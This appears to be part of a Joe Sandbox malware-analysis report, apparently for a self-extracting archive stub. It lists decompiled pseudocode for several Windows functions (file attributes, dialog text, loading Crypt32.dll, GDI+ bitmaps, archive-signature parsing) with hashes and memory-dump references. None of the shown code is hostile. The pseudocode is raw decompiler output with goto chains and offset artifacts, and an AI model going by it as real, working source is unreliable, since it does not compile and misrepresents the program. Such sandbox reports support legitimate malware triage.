                • Opcode ID: a694555a835eb92c6ef904fd8903cf998f0b9d7fcf9be37584d036fddc79a280
                • Instruction ID: 7db94683ea7c82e76529538d60071e713e2e8c40fcb9bd0049bc31340f15d546
                • Opcode Fuzzy Hash: a694555a835eb92c6ef904fd8903cf998f0b9d7fcf9be37584d036fddc79a280
                • Instruction Fuzzy Hash: B5E06572504650EFCB019F59DD06B45FBACFB48B20F10437AF416D37A0CBB46840CA94
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003DA243 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E003DA243(WCHAR* _a4) {
				short _v4100;
				long _t7;
				long _t12;
				long _t13;

				E003EEC50(0x1000);
				_t7 = GetFileAttributesW(_a4); // executed
				_t13 = _t7;
				if(_t13 == 0xffffffff && E003DBB03(_a4,  &_v4100, 0x800) != 0) {
					_t12 = GetFileAttributesW( &_v4100); // executed
					_t13 = _t12;
				}
				return _t13;
			}







                0x003da24b
                0x003da254
                0x003da25a
                0x003da25f
                0x003da280
                0x003da286
                0x003da286
                0x003da28c

                APIs
                • GetFileAttributesW.KERNELBASE(?,?,?,003DA23A,?,003D755C,?,?,?,?), ref: 003DA254
                  • Part of subcall function 003DBB03: _wcslen.LIBCMT ref: 003DBB27
                • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,003DA23A,?,003D755C,?,?,?,?), ref: 003DA280
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: AttributesFile$_wcslen
                • String ID:
                • API String ID: 2673547680-0
                • Opcode ID: 7884cbc2251b38b9e59a92c16fc7f167cd9a22e1f22d9da019462ce7e51e272d
                • Instruction ID: 250926030b5458df37116dd37269505fdce214c636108ab6520f3b78cd5ec67d
                • Opcode Fuzzy Hash: 7884cbc2251b38b9e59a92c16fc7f167cd9a22e1f22d9da019462ce7e51e272d
                • Instruction Fuzzy Hash: 02E092325001249BDB22AB64DD05BD9BB5CAB093E2F054672FD54E7294D770DE44CAA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EDEC2 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E003EDEC2(void* __eflags, intOrPtr _a4, signed char _a16) {
				short _v5124;
				signed int _t16;

				E003EEC50(0x1400);
				E003D4092( &_v5124, 0xa00, E003DE617((_a16 & 0x000000ff) + 0x65), _a4);
				SetDlgItemTextW( *0x418458, 0x65,  &_v5124); // executed
				_t16 = E003EB568(); // executed
				return _t16 & 0xffffff00 |  *0x418454 == 0x00000000;
			}





                0x003edeca
                0x003edeec
                0x003edf03
                0x003edf09
                0x003edf19

                APIs
                • _swprintf.LIBCMT ref: 003EDEEC
                  • Part of subcall function 003D4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003D40A5
                • SetDlgItemTextW.USER32(00000065,?), ref: 003EDF03
                  • Part of subcall function 003EB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 003EB579
                  • Part of subcall function 003EB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 003EB58A
                  • Part of subcall function 003EB568: IsDialogMessageW.USER32(000303F2,?), ref: 003EB59E
                  • Part of subcall function 003EB568: TranslateMessage.USER32(?), ref: 003EB5AC
                  • Part of subcall function 003EB568: DispatchMessageW.USER32(?), ref: 003EB5B6
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                • String ID:
                • API String ID: 2718869927-0
                • Opcode ID: e01ccc5ae16ac7672f8e15f74206a8bf5a91dc2bfe5359cf9ff9abb905f81acf
                • Instruction ID: 63a4cc4da5202fc542842b44be4dd02906e6174f00be4095f388c24555c6acb6
                • Opcode Fuzzy Hash: e01ccc5ae16ac7672f8e15f74206a8bf5a91dc2bfe5359cf9ff9abb905f81acf
                • Instruction Fuzzy Hash: 79E092B650029826DF03AB61DC06FDE3B6C5B05785F044866B240DE1E2EA78EA148665
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003E081B Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E003E081B(intOrPtr _a4) {
				short _v4100;
				int _t8;
				struct HINSTANCE__* _t12;

				E003EEC50(0x1000);
				_t8 = GetSystemDirectoryW( &_v4100, 0x800);
				_t14 = _t8;
				if(_t8 != 0) {
					E003DBDF3(_t14,  &_v4100, _a4,  &_v4100, 0x800);
					_t12 = LoadLibraryW( &_v4100); // executed
					return _t12;
				}
				return _t8;
			}






                0x003e0823
                0x003e0836
                0x003e083c
                0x003e083e
                0x003e084c
                0x003e0858
                0x00000000
                0x003e0858
                0x003e0860

                APIs
                • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 003E0836
                • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,003DF2D8,Crypt32.dll,00000000,003DF35C,?,?,003DF33E,?,?,?), ref: 003E0858
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: DirectoryLibraryLoadSystem
                • String ID:
                • API String ID: 1175261203-0
                • Opcode ID: 5ba115bb6fed5e6581311e6fbfe8a3f60006564431d0acc0ab55ff4c0008e126
                • Instruction ID: ccc4111ff520f6ec8adf1f36e50e5605700a1f0c9120ca99d602a7f1f37b0a72
                • Opcode Fuzzy Hash: 5ba115bb6fed5e6581311e6fbfe8a3f60006564431d0acc0ab55ff4c0008e126
                • Instruction Fuzzy Hash: 21E048764011686BDF11AB95DD05FDA7BACEF0D3D2F040075B645E2148D6B4DA84CBB4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EA3B9 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                C-Code - Quality: 73%
                			E003EA3B9(signed int __ecx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _t10;
				signed int _t15;

				_push(__ecx);
				_t15 = __ecx;
				_t10 =  &_v8;
				_v8 = __ecx;
				_v8 = _v8 & 0x00000000;
				_push(_t10);
				_push(_a4);
				 *__ecx = 0x404740;
				if(_a8 == 0) {
					L003EEB1A(); // executed
				} else {
					L003EEB20();
				}
				 *((intOrPtr*)(_t15 + 8)) = _t10;
				 *(_t15 + 4) = _v8;
				return _t15;
			}






                0x003ea3bc
                0x003ea3be
                0x003ea3c0
                0x003ea3c3
                0x003ea3c6
                0x003ea3ce
                0x003ea3cf
                0x003ea3d2
                0x003ea3d8
                0x003ea3e1
                0x003ea3da
                0x003ea3da
                0x003ea3da
                0x003ea3e6
                0x003ea3ec
                0x003ea3f3

                APIs
                • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 003EA3DA
                • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 003EA3E1
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: BitmapCreateFromGdipStream
                • String ID:
                • API String ID: 1918208029-0
                • Opcode ID: 0841e33c7fdd1da80e885deeb99a995bb35018853d1ffa1f007e5bc7f0ebf03e
                • Instruction ID: 416074c9d26596644fc6808726568d72cd403c8d53b23eda7d5652ae60df70d0
                • Opcode Fuzzy Hash: 0841e33c7fdd1da80e885deeb99a995bb35018853d1ffa1f007e5bc7f0ebf03e
                • Instruction Fuzzy Hash: CEE0ED75904268EBCB11DF56C541699BBE8EB04360F20C15AA84697281E374AE04DB91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003F2B8C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                Download Yara Rule
                C-Code - Quality: 80%
                			E003F2B8C(void* __ecx, void* __eflags) {
				intOrPtr _t1;
				void* _t2;
				void* _t7;
				void* _t9;

				_t1 = E003F3C57(__ecx, __eflags, E003F2AD0); // executed
				 *0x40e7d0 = _t1;
				_pop(_t7);
				if(_t1 != 0xffffffff) {
					_t2 = E003F3D08(_t7, __eflags, _t1, 0x432060);
					_pop(_t9);
					__eflags = _t2;
					if(_t2 != 0) {
						return 1;
					} else {
						E003F2BBF(_t9);
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}







                0x003f2b91
                0x003f2b96
                0x003f2b9b
                0x003f2b9f
                0x003f2baa
                0x003f2bb0
                0x003f2bb1
                0x003f2bb3
                0x003f2bbe
                0x003f2bb5
                0x003f2bb5
                0x00000000
                0x003f2bb5
                0x003f2ba1
                0x003f2ba1
                0x003f2ba3
                0x003f2ba3

                APIs
                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 003F2BAA
                • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 003F2BB5
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: Value___vcrt____vcrt_uninitialize_ptd
                • String ID:
                • API String ID: 1660781231-0
                • Opcode ID: 9123392b4d539981ebdd97421b62a166c361f4cac4dbf2b588f5c4ef70dc6688
                • Instruction ID: c4ea2bae3c4af731ed35346770654475c90a7e9fd7d34c0507aa2bea086efefb
                • Opcode Fuzzy Hash: 9123392b4d539981ebdd97421b62a166c361f4cac4dbf2b588f5c4ef70dc6688
                • Instruction Fuzzy Hash: 0FD0223415830CD89C1B2F712A075BB3759ED41B71BF1169BFF20AE9C1EF208840A415
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003D12F1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                Download Yara Rule
                C-Code - Quality: 58%
                			E003D12F1(struct HWND__* _a4, int _a8, signed char _a12) {
				int _t8;

				asm("sbb eax, eax");
				_t8 = ShowWindow(GetDlgItem(_a4, _a8),  ~(_a12 & 0x000000ff) & 0x00000009); // executed
				return _t8;
			}




                0x003d12f8
                0x003d130d
                0x003d1313

                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: ItemShowWindow
                • String ID:
                • API String ID: 3351165006-0
                • Opcode ID: 3e741f6237c5e71cc8733df8fb088e7b7818a972868b26bd2d683a0f8a364121
                • Instruction ID: 6aa3762ec7f38cdceb7ed01462c1df670c8193511c4acc0aef68c4a9e3f642d7
                • Opcode Fuzzy Hash: 3e741f6237c5e71cc8733df8fb088e7b7818a972868b26bd2d683a0f8a364121
                • Instruction Fuzzy Hash: 3FC0123205C200BEDF010FB4DC09C2BBBA8ABA5312F04C928B4A5C0060C238C910DB11
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003D1A04 Relevance: 1.8, APIs: 1, Instructions: 312COMMON
                Download Yara Rule
                C-Code - Quality: 62%
                			E003D1A04(intOrPtr* __ecx, void* __edx) {
				void* __esi;
				char _t101;
				signed int _t103;
				intOrPtr _t107;
				signed int _t109;
				signed int _t111;
				signed int _t113;
				signed int _t114;
				void* _t119;
				signed int _t125;
				intOrPtr _t126;
				char _t127;
				char _t137;
				intOrPtr _t142;
				signed int _t143;
				void* _t146;
				signed int _t151;
				signed int _t155;
				void* _t160;
				void* _t162;
				void* _t166;
				intOrPtr* _t167;
				signed int _t181;
				void* _t182;
				signed int _t184;
				char* _t198;
				intOrPtr _t199;
				signed int _t200;
				void* _t210;
				void* _t211;
				intOrPtr _t212;
				void* _t214;
				char* _t215;
				intOrPtr _t216;
				void* _t217;
				void* _t224;
				void* _t226;

				_t210 = __edx;
				E003EEB78(0x40265a, _t226);
				_t167 = __ecx;
				_t212 = 7;
				 *((char*)(__ecx + 0x6cd4)) = 0;
				 *((char*)(__ecx + 0x6cdc)) = 0;
				 *0x403278(__ecx + 0x2210, _t212, _t211, _t217, _t166);
				if( *((intOrPtr*)( *((intOrPtr*)( *__ecx + 0xc))))() != _t212) {
					L23:
					_t101 = 0;
					L24:
					 *[fs:0x0] =  *((intOrPtr*)(_t226 - 0xc));
					return _t101;
				}
				_t220 = 0;
				 *((intOrPtr*)(__ecx + 0x6cd8)) = 0;
				_t103 = E003D1DF8(__ecx + 0x2210, _t212);
				if(_t103 == 0) {
					E003D13BA(_t226 - 0x38, 0x200000);
					 *(_t226 - 4) = 0;
					 *0x403278();
					_t107 =  *((intOrPtr*)( *((intOrPtr*)( *_t167 + 0x14))))(); // executed
					 *((intOrPtr*)(_t226 - 0x18)) = _t107;
					 *0x403278( *((intOrPtr*)(_t226 - 0x38)),  *((intOrPtr*)(_t226 - 0x34)) + 0xfffffff0);
					_t109 =  *( *_t167 + 0xc)();
					_t181 = _t109;
					_t220 = 0;
					 *(_t226 - 0x14) = _t181;
					__eflags = _t181;
					if(_t181 <= 0) {
						L21:
						__eflags =  *(_t167 + 0x6cd8);
						_t182 = _t226 - 0x38;
						if( *(_t167 + 0x6cd8) != 0) {
							_t38 = _t226 - 4; // executed
							 *_t38 =  *(_t226 - 4) | 0xffffffff;
							__eflags =  *_t38;
							E003D15FB(_t182); // executed
							L26:
							_t111 =  *(_t167 + 0x6cc8);
							_t234 = _t111 - 4;
							if(_t111 != 4) {
								__eflags = _t111 - 3;
								if(_t111 != 3) {
									L32:
									 *((intOrPtr*)(_t167 + 0x2218)) = _t212;
									 *((char*)(_t226 - 0xd)) = 0;
									_t113 = E003D3B2D(_t167, _t210, _t220);
									__eflags = _t113;
									 *((char*)(_t226 - 0xe)) = _t113 != 0;
									__eflags = _t113;
									if(_t113 == 0) {
										L38:
										_t114 =  *((intOrPtr*)(_t226 - 0xd));
										L39:
										_t184 =  *((intOrPtr*)(_t167 + 0x6cdd));
										__eflags = _t184;
										if(_t184 == 0) {
											L41:
											__eflags =  *((char*)(_t167 + 0x6cdc));
											if( *((char*)(_t167 + 0x6cdc)) != 0) {
												L43:
												__eflags = _t184;
												if(__eflags == 0) {
													E003D138B(__eflags, 0x1b, _t167 + 0x32);
												}
												__eflags =  *((char*)(_t226 + 8));
												if( *((char*)(_t226 + 8)) == 0) {
													goto L23;
												} else {
													L46:
													__eflags =  *((char*)(_t226 - 0xe));
													 *((char*)(_t167 + 0x6cce)) =  *((intOrPtr*)(_t167 + 0x223c));
													if( *((char*)(_t226 - 0xe)) == 0) {
														L69:
														__eflags =  *((char*)(_t167 + 0x6ccd));
														if( *((char*)(_t167 + 0x6ccd)) == 0) {
															L71:
															E003E0602(_t167 + 0x6d12, _t167 + 0x32, 0x800);
															L72:
															_t101 = 1;
															goto L24;
														}
														__eflags =  *((char*)(_t167 + 0x6cd1));
														if( *((char*)(_t167 + 0x6cd1)) == 0) {
															goto L72;
														}
														goto L71;
													}
													__eflags =  *((char*)(_t167 + 0x21f8));
													if( *((char*)(_t167 + 0x21f8)) == 0) {
														L49:
														__eflags =  *((intOrPtr*)(_t167 + 0x10)) - 1;
														if( *((intOrPtr*)(_t167 + 0x10)) == 1) {
															goto L69;
														}
														 *0x403278();
														_t119 =  *((intOrPtr*)( *((intOrPtr*)( *_t167 + 0x14))))(); // executed
														_t224 = _t119;
														_t214 = _t210;
														 *((intOrPtr*)(_t226 - 0x18)) =  *((intOrPtr*)(_t167 + 0x6cb8));
														 *(_t226 - 0x14) =  *(_t167 + 0x6cbc);
														 *((intOrPtr*)(_t226 - 0x1c)) =  *((intOrPtr*)(_t167 + 0x6cc0));
														 *((intOrPtr*)(_t226 - 0x20)) =  *((intOrPtr*)(_t167 + 0x6cc4));
														 *((intOrPtr*)(_t226 - 0x24)) =  *((intOrPtr*)(_t167 + 0x21f4));
														while(1) {
															_t125 = E003D3B2D(_t167, _t210, _t224);
															__eflags = _t125;
															if(_t125 == 0) {
																break;
															}
															_t126 =  *((intOrPtr*)(_t167 + 0x21f4));
															__eflags = _t126 - 3;
															if(_t126 != 3) {
																__eflags = _t126 - 2;
																if(_t126 == 2) {
																	__eflags =  *((char*)(_t167 + 0x6ccd));
																	if( *((char*)(_t167 + 0x6ccd)) == 0) {
																		L66:
																		_t127 = 0;
																		__eflags = 0;
																		L67:
																		 *((char*)(_t167 + 0x6cd1)) = _t127;
																		L68:
																		 *((intOrPtr*)(_t167 + 0x6cb8)) =  *((intOrPtr*)(_t226 - 0x18));
																		 *(_t167 + 0x6cbc) =  *(_t226 - 0x14);
																		 *((intOrPtr*)(_t167 + 0x6cc0)) =  *((intOrPtr*)(_t226 - 0x1c));
																		 *((intOrPtr*)(_t167 + 0x6cc4)) =  *((intOrPtr*)(_t226 - 0x20));
																		 *((intOrPtr*)(_t167 + 0x21f4)) =  *((intOrPtr*)(_t226 - 0x24));
																		 *0x403278(_t224, _t214, 0);
																		 *( *( *_t167 + 0x10))();
																		goto L69;
																	}
																	__eflags =  *((char*)(_t167 + 0x3330));
																	if( *((char*)(_t167 + 0x3330)) != 0) {
																		goto L66;
																	}
																	_t127 = 1;
																	goto L67;
																}
																__eflags = _t126 - 5;
																if(_t126 == 5) {
																	goto L68;
																}
																L60:
																E003D1F47(_t167);
																continue;
															}
															__eflags =  *((char*)(_t167 + 0x6ccd));
															if( *((char*)(_t167 + 0x6ccd)) == 0) {
																L56:
																_t137 = 0;
																__eflags = 0;
																L57:
																 *((char*)(_t167 + 0x6cd1)) = _t137;
																goto L60;
															}
															__eflags =  *((char*)(_t167 + 0x5680));
															if( *((char*)(_t167 + 0x5680)) != 0) {
																goto L56;
															}
															_t137 = 1;
															goto L57;
														}
														goto L68;
													}
													__eflags =  *((char*)(_t167 + 0x6cd4));
													if( *((char*)(_t167 + 0x6cd4)) != 0) {
														goto L69;
													}
													goto L49;
												}
											}
											__eflags = _t114;
											if(_t114 != 0) {
												goto L46;
											}
											goto L43;
										}
										__eflags =  *((char*)(_t226 + 8));
										if( *((char*)(_t226 + 8)) == 0) {
											goto L23;
										}
										goto L41;
									}
									__eflags = 0;
									 *((char*)(_t226 - 0xd)) = 0;
									while(1) {
										E003D1F47(_t167);
										_t142 =  *((intOrPtr*)(_t167 + 0x21f4));
										__eflags = _t142 - 1;
										if(_t142 == 1) {
											break;
										}
										__eflags =  *((char*)(_t167 + 0x21f8));
										if( *((char*)(_t167 + 0x21f8)) == 0) {
											L37:
											_t143 = E003D3B2D(_t167, _t210, _t220);
											__eflags = _t143;
											 *((char*)(_t226 - 0xe)) = _t143 != 0;
											__eflags = _t143;
											if(_t143 != 0) {
												continue;
											}
											goto L38;
										}
										__eflags = _t142 - 4;
										if(_t142 == 4) {
											break;
										}
										goto L37;
									}
									_t114 = 1;
									goto L39;
								}
								_t215 = _t167 + 0x2217;
								_t220 =  *( *_t167 + 0xc);
								 *0x403278(_t215, 1);
								_t146 =  *( *( *_t167 + 0xc))();
								__eflags = _t146 - 1;
								if(_t146 != 1) {
									goto L23;
								}
								__eflags =  *_t215;
								if( *_t215 != 0) {
									goto L23;
								}
								_t212 = 8;
								goto L32;
							}
							E003D138B(_t234, 0x3c, _t167 + 0x32);
							goto L23;
						}
						E003D15FB(_t182);
						goto L23;
					} else {
						goto L5;
					}
					do {
						L5:
						_t198 =  *((intOrPtr*)(_t226 - 0x38)) + _t220;
						__eflags =  *_t198 - 0x52;
						if( *_t198 != 0x52) {
							goto L16;
						}
						_t151 = E003D1DF8(_t198, _t109 - _t220);
						__eflags = _t151;
						if(_t151 == 0) {
							L15:
							_t109 =  *(_t226 - 0x14);
							goto L16;
						}
						_t199 =  *((intOrPtr*)(_t226 - 0x18));
						 *(_t167 + 0x6cc8) = _t151;
						__eflags = _t151 - 1;
						if(_t151 != 1) {
							L18:
							_t200 = _t199 + _t220;
							 *(_t167 + 0x6cd8) = _t200;
							_t220 =  *( *_t167 + 0x10);
							 *0x403278(_t200, 0, 0);
							 *( *( *_t167 + 0x10))();
							_t155 =  *(_t167 + 0x6cc8);
							__eflags = _t155 - 2;
							if(_t155 == 2) {
								L20:
								_t220 =  *( *_t167 + 0xc);
								 *0x403278(_t167 + 0x2210, _t212);
								 *( *( *_t167 + 0xc))();
								goto L21;
							}
							__eflags = _t155 - 3;
							if(_t155 != 3) {
								goto L21;
							}
							goto L20;
						}
						__eflags = _t220;
						if(_t220 <= 0) {
							goto L18;
						}
						__eflags = _t199 - 0x1c;
						if(_t199 >= 0x1c) {
							goto L18;
						}
						__eflags =  *(_t226 - 0x14) - 0x1f;
						if( *(_t226 - 0x14) <= 0x1f) {
							goto L18;
						}
						_t160 =  *((intOrPtr*)(_t226 - 0x38)) - _t199;
						__eflags =  *((char*)(_t160 + 0x1c)) - 0x52;
						if( *((char*)(_t160 + 0x1c)) != 0x52) {
							goto L15;
						}
						__eflags =  *((char*)(_t160 + 0x1d)) - 0x53;
						if( *((char*)(_t160 + 0x1d)) != 0x53) {
							goto L15;
						}
						__eflags =  *((char*)(_t160 + 0x1e)) - 0x46;
						if( *((char*)(_t160 + 0x1e)) != 0x46) {
							goto L15;
						}
						__eflags =  *((char*)(_t160 + 0x1f)) - 0x58;
						if( *((char*)(_t160 + 0x1f)) == 0x58) {
							goto L18;
						}
						goto L15;
						L16:
						_t220 = _t220 + 1;
						__eflags = _t220 - _t109;
					} while (_t220 < _t109);
					goto L21;
				}
				 *(_t167 + 0x6cc8) = _t103;
				if(_t103 == 1) {
					_t216 =  *_t167;
					_t220 =  *(_t216 + 0x14);
					 *0x403278(0);
					_t162 =  *( *(_t216 + 0x14))();
					asm("sbb edx, 0x0");
					 *0x403278(_t162 - 7, __edx);
					 *((intOrPtr*)(_t216 + 0x10))();
					_t212 = 7;
				}
				goto L26;
			}








































                0x003d1a04
                0x003d1a09
                0x003d1a13
                0x003d1a18
                0x003d1a23
                0x003d1a2f
                0x003d1a36
                0x003d1a42
                0x003d1ba0
                0x003d1ba0
                0x003d1ba2
                0x003d1ba8
                0x003d1bb0
                0x003d1bb0
                0x003d1a4f
                0x003d1a52
                0x003d1a58
                0x003d1a5f
                0x003d1aa8
                0x003d1aaf
                0x003d1ab7
                0x003d1abf
                0x003d1acd
                0x003d1ad3
                0x003d1adb
                0x003d1ade
                0x003d1ae0
                0x003d1ae2
                0x003d1ae5
                0x003d1ae7
                0x003d1b8f
                0x003d1b8f
                0x003d1b96
                0x003d1b99
                0x003d1bb3
                0x003d1bb3
                0x003d1bb3
                0x003d1bb7
                0x003d1bbc
                0x003d1bbc
                0x003d1bc2
                0x003d1bc5
                0x003d1bd4
                0x003d1bd7
                0x003d1c00
                0x003d1c02
                0x003d1c0a
                0x003d1c0d
                0x003d1c12
                0x003d1c14
                0x003d1c18
                0x003d1c1a
                0x003d1c5a
                0x003d1c5a
                0x003d1c5d
                0x003d1c5d
                0x003d1c63
                0x003d1c65
                0x003d1c71
                0x003d1c71
                0x003d1c78
                0x003d1c7e
                0x003d1c7e
                0x003d1c80
                0x003d1c88
                0x003d1c88
                0x003d1c8d
                0x003d1c91
                0x00000000
                0x003d1c97
                0x003d1c97
                0x003d1c97
                0x003d1ca1
                0x003d1ca7
                0x003d1dc1
                0x003d1dc1
                0x003d1dc8
                0x003d1dd3
                0x003d1de3
                0x003d1de8
                0x003d1de8
                0x00000000
                0x003d1de8
                0x003d1dca
                0x003d1dd1
                0x00000000
                0x00000000
                0x00000000
                0x003d1dd1
                0x003d1cad
                0x003d1cb4
                0x003d1cc3
                0x003d1cc3
                0x003d1cc7
                0x00000000
                0x00000000
                0x003d1cd4
                0x003d1cdc
                0x003d1cde
                0x003d1ce0
                0x003d1ce8
                0x003d1cf1
                0x003d1cfa
                0x003d1d03
                0x003d1d0c
                0x003d1d54
                0x003d1d56
                0x003d1d5b
                0x003d1d5d
                0x00000000
                0x00000000
                0x003d1d18
                0x003d1d1e
                0x003d1d21
                0x003d1d43
                0x003d1d46
                0x003d1d61
                0x003d1d68
                0x003d1d77
                0x003d1d77
                0x003d1d77
                0x003d1d79
                0x003d1d79
                0x003d1d7f
                0x003d1d82
                0x003d1d8b
                0x003d1d94
                0x003d1d9d
                0x003d1da6
                0x003d1db7
                0x003d1dbf
                0x00000000
                0x003d1dbf
                0x003d1d6a
                0x003d1d71
                0x00000000
                0x00000000
                0x003d1d73
                0x00000000
                0x003d1d73
                0x003d1d48
                0x003d1d4b
                0x00000000
                0x00000000
                0x003d1d4d
                0x003d1d4f
                0x00000000
                0x003d1d4f
                0x003d1d23
                0x003d1d2a
                0x003d1d39
                0x003d1d39
                0x003d1d39
                0x003d1d3b
                0x003d1d3b
                0x00000000
                0x003d1d3b
                0x003d1d2c
                0x003d1d33
                0x00000000
                0x00000000
                0x003d1d35
                0x00000000
                0x003d1d35
                0x00000000
                0x003d1d5f
                0x003d1cb6
                0x003d1cbd
                0x00000000
                0x00000000
                0x00000000
                0x003d1cbd
                0x003d1c91
                0x003d1c7a
                0x003d1c7c
                0x00000000
                0x00000000
                0x00000000
                0x003d1c7c
                0x003d1c67
                0x003d1c6b
                0x00000000
                0x00000000
                0x00000000
                0x003d1c6b
                0x003d1c1c
                0x003d1c1e
                0x003d1c21
                0x003d1c23
                0x003d1c28
                0x003d1c2e
                0x003d1c31
                0x00000000
                0x00000000
                0x003d1c37
                0x003d1c3e
                0x003d1c49
                0x003d1c4b
                0x003d1c50
                0x003d1c52
                0x003d1c56
                0x003d1c58
                0x00000000
                0x00000000
                0x00000000
                0x003d1c58
                0x003d1c40
